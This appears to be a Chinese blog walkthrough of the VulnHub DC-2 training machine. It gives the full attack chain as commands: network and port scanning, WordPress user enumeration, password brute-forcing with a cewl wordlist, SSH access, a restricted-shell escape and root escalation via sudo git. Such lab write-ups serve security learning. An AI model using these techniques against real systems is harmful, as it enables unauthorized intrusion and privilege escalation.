vulnhub dc-2

netdiscover -r 192.168.182.0/24 查询ip,确定为143

nmap扫描: nmap -p- 192.168.182.143  端口扫描 ,发现80与7744(远程连接)开放

首先80起手,发现找不到,但注意url上显示的为dc-2而不是192.168.182.143:80,说明重定向了,所以需要本地解析,更改hosts文件 C:\Windows\System32\drivers\etc\hosts

添加内容,保存后就能登录上了

下拉找到flag1

根据提示内容使用cewl

cewl是一款爬虫工具,爬取指定url上的关键字并返回一个字典做为爆破使用

同时,插件看网站cms为WordPress,wpscan就是专门针对这个框架的

wpscan --url http://dc-2 --e t 扫描主题

wpscan --url http://dc-2 --e p 扫描插件

wpscan --url http://dc-2 --e u 枚举用户

这里扫描用户找到3个

使用cewl进行爬虫 cewl http://dc-2/ > passwd.txt 去url上爬取内容并保存再passwd.txt,可以cat看看是否爬到

wpscan --url http://dc-2 --passwords passwd.txt 暴力破解,根据字典爆破,成功出密码,去页面登录吧(dirsearch一下目录,能看到登录页面)

在page中找到flag2,用另一种方法进入,开始nmap扫描时还有一个7744端口开放,那就ssh喽

ssh tom@192.168.182.143 -p 7744

ssh jerry@192.168.182.143 -p 7744

都尝试,发现tom能连接上

展开找到flag4,注意是-rbash,其中一些命令好使,使用vi打开flag

可以使用echo $PATH 查看在rbash中哪些命令可以使用

可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力承担责任。 其中说should su 使用su上jerry内账号看看

使用su,但找不到,所以需要rbash逃逸,为啥逃逸,不逃逸的话命令不好使啊,就像cat都不让用

BASH_CMDS[a]=/bin/sh;a

$ export PATH=$PATH:/bin/

$ export PATH=$PATH:/usr/bin

这些命令的含义就是配置一个环境变量,可以使用bin目录下的命令,这里可以看到su命令可以使用了

su jerry 进入jerry中,也可以返回home目录找到jerry再cd进入

flag4翻译就是:啥也没有,(但我理解其中你就是你自己,指的tom或jerry而不是root权限,GO on - git outta here,使用git提权)

提示了git,但先sudo -l看权限

这里看到root 无密码的状态下git可以

最后一步了,提权!!!

sudo git help config

!/bin/bash

提权方法可自行度娘

找到啦

进入到root权限中 vi /etc/sudoers 打开sudoers文件,里面记录了root权限赋予的一些命令

sudoers文件里面存储了sudo权限的相关配置

这句话是 jerry被赋予了root可以是用的git命令且不需要密码,所以使用git方式提权

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值